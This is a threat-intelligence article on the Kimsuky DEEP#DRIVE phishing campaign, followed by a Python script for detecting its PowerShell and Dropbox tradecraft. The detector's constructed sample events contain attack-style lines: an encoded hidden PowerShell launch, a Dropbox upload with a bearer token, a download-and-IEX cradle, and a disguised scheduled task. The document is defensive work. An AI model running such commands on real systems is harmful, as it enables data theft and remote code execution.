A recent cybersecurity investigation has uncovered a sophisticated attack campaign, dubbed DEEP#DRIVE, attributed to the North Korean Advanced Persistent Threat (APT) group, Kimsuky.
This operation has targeted South Korean businesses, government entities, and cryptocurrency users by exploiting trusted platforms like Dropbox and leveraging obfuscated PowerShell scripts for stealthy infiltration.
The attack begins with phishing emails containing malicious shortcut (.lnk) files disguised as legitimate documents such as work logs, insurance forms, or cryptocurrency-related files.
These files are crafted to bypass security measures by exploiting Windows’ default behavior of hiding file extensions.
Once executed, the malicious .lnk files initiate a multi-stage attack chain involving PowerShell scripts to download and execute further payloads.
Key Attack Techniques
According to the Securonix report, the campaign relies heavily on Dropbox for hosting malware payloads and exfiltrating stolen data.
By using Dropbox’s reputation as a trusted platform, the attackers evade conventional network defenses.
The initial stage involves downloading a compressed file containing a shortcut file that triggers the execution of obfuscated PowerShell scripts.
These scripts perform various functions, including:
- Reconnaissance: Gathering system information such as IP addresses, operating system details, antivirus products, and running processes.
- Payload Execution: Downloading and executing additional malware components stored in Dropbox.
- Persistence: Establishing scheduled tasks disguised as legitimate system updates to ensure the malware remains active even after system reboots.
The attackers employed advanced obfuscation techniques in their scripts, such as meaningless variable names and junk code, to evade detection by antivirus software and log analysis tools.
Additionally, they used Base64 encoding and dynamic file processing to hide their activities.
Infrastructure and Attribution
The attackers’ infrastructure was short-lived but dynamic, with rapid takedowns of critical Dropbox links to hinder analysis.
The use of OAuth tokens for Dropbox API interactions facilitated seamless data exfiltration to preconfigured directories.
Thousands of victim configuration files were discovered in the attackers’ Dropbox repository, indicating a large-scale campaign dating back several months.
The tactics, techniques, and procedures (TTPs) observed align closely with previous campaigns attributed to Kimsuky.
The group’s focus on South Korea, use of Dropbox for malware delivery, and reliance on phishing lures written in Korean strongly support this attribution.
This campaign underscores the growing sophistication of APT groups in leveraging trusted cloud platforms for malicious purposes. Organizations are advised to:
- Avoid downloading unsolicited attachments or files from unknown sources.
- Monitor common malware staging directories for suspicious activity.
- Deploy robust endpoint logging capabilities to detect PowerShell-based attacks.
- Educate employees on recognizing phishing attempts and the risks associated with .lnk files.
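The behaviours described above (hidden-window PowerShell launched from a shortcut, Base64-encoded commands, Dropbox API calls carrying an OAuth bearer token, reconnaissance cmdlets, and scheduled tasks named like system updates) map directly onto the endpoint logging the recommendations call for. The following Python is an added example, not code from Securonix or from the article: it turns those behaviours into triage logic over Windows Security/Sysmon-style event records (process creation 4688, PowerShell script block 4104, scheduled task creation 4698). The event records are constructed and contain no real indicators from the campaign; the indicator weights, the Dropbox hostname list and the recon cmdlet list are assumptions chosen for illustration.

```python
"""Triage heuristics for PowerShell/Dropbox tradecraft over constructed Windows events.
Added example, not from Securonix or the article; all sample data below is constructed."""
import base64
import re

# Dropbox endpoints a script would contact for payload download or API-based exfiltration (assumed list).
DROPBOX_HOSTS = ("api.dropboxapi.com", "content.dropboxapi.com", "dl.dropboxusercontent.com")
# Cmdlets / WMI classes used for host reconnaissance: OS, AV products, processes, IP addresses (assumed list).
RECON_PATTERNS = (r"Win32_OperatingSystem", r"AntiVirusProduct", r"Get-Process", r"ipconfig", r"Get-NetIPAddress")
# Per-indicator weights (assumed); a single strong indicator should not alert on its own.
WEIGHTS = {"dropbox_api": 3, "bearer_token": 3, "update_lookalike_task": 3, "encoded_command": 2,
           "hidden_window": 2, "recon": 2, "dynamic_exec": 2, "schtask_create": 2,
           "policy_bypass": 1, "base64_layer": 1, "launched_from_explorer": 1}

ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)


def decode_encoded_command(cmdline):
    """Return the script behind a -EncodedCommand argument, or None.
    PowerShell expects UTF-16LE text beneath the Base64 layer."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_script_text(text):
    """Return the set of indicator tags found in PowerShell source text."""
    tags = set()
    low = text.lower()
    if any(h in low for h in DROPBOX_HOSTS):
        tags.add("dropbox_api")
    if "authorization" in low and "bearer" in low:
        tags.add("bearer_token")
    if any(re.search(p, text, re.I) for p in RECON_PATTERNS):
        tags.add("recon")
    if re.search(r"frombase64string|-encodedcommand", low):
        tags.add("base64_layer")
    if re.search(r"invoke-expression|\biex\b", low):
        tags.add("dynamic_exec")
    if re.search(r"register-scheduledtask|schtasks(?:\.exe)?\s+/create", low):
        tags.add("schtask_create")
    return tags


def analyze_event(ev):
    """Score one event record; returns (score, tags)."""
    tags = set()
    eid = ev.get("EventID")
    if eid == 4688:  # process creation
        cl = ev.get("CommandLine", "")
        if "powershell" in cl.lower():
            if HIDDEN_RE.search(cl):
                tags.add("hidden_window")
            if BYPASS_RE.search(cl):
                tags.add("policy_bypass")
            if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
                tags.add("launched_from_explorer")  # typical when a .lnk lure is double-clicked
            decoded = decode_encoded_command(cl)
            if decoded is not None:
                tags.add("encoded_command")
                tags |= analyze_script_text(decoded)  # inspect what the Base64 hides
    elif eid == 4104:  # PowerShell script block logging
        tags |= analyze_script_text(ev.get("ScriptBlockText", ""))
    elif eid == 4698:  # scheduled task created
        name, content = ev.get("TaskName", ""), ev.get("TaskContent", "")
        if "update" in name.lower() and "powershell" in content.lower():
            tags.add("update_lookalike_task")  # "system update" name, PowerShell action
        if HIDDEN_RE.search(content):
            tags.add("hidden_window")
    return sum(WEIGHTS.get(t, 1) for t in tags), tags


def triage(events, threshold=5):
    """Return [(index, score, sorted tags)] for events scoring at or above threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, tags = analyze_event(ev)
        if score >= threshold:
            hits.append((i, score, sorted(tags)))
    return hits


# Constructed sample script: recon plus a Dropbox API upload with a placeholder bearer token.
SAMPLE_SCRIPT = ("$os = Get-WmiObject Win32_OperatingSystem; "
                 "$av = Get-WmiObject -Namespace root/SecurityCenter2 -Class AntiVirusProduct; "
                 "Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload "
                 "-Headers @{Authorization='Bearer PLACEHOLDER_TOKEN'}")
SAMPLE_ENC = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()

# Constructed event records (benign and suspicious) in Security/Sysmon-like field names.
SAMPLE_EVENTS = [
    {"EventID": 4688, "CommandLine": r"C:\Windows\System32\cmd.exe /c dir", "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 4688, "CommandLine": "powershell.exe -w hidden -ep bypass -enc " + SAMPLE_ENC,
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem C:\Users | Measure-Object"},
    {"EventID": 4104, "ScriptBlockText": "$u='https://dl.dropboxusercontent.com/s/CONSTRUCTED/stage2.txt'; "
     "$s=(New-Object Net.WebClient).DownloadString($u); IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($s)))"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\WindowsUpdate\SystemUpdateCheck",
     "TaskContent": r"<Exec><Command>powershell.exe</Command><Arguments>-w hidden -File C:\Users\Public\update.ps1</Arguments></Exec>"},
    {"EventID": 4698, "TaskName": r"\Backup\NightlyCopy", "TaskContent": r"<Exec><Command>robocopy.exe</Command></Exec>"},
]

if __name__ == "__main__":
    for idx, score, tags in triage(SAMPLE_EVENTS):
        print(f"event {idx}: score={score} tags={tags}")
```

The scoring is deliberately additive: a Dropbox hostname alone is normal in many environments, and a hidden-window PowerShell launch alone is noisy, but the combination with an encoded command, a bearer token, or an update-themed scheduled task is what separates this tradecraft from routine administration. Decoding the Base64 layer before matching matters; without it the process-creation event for the encoded command carries none of the content indicators.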
As cyber threats evolve, vigilance and proactive security measures remain critical in mitigating risks posed by advanced adversaries like Kimsuky.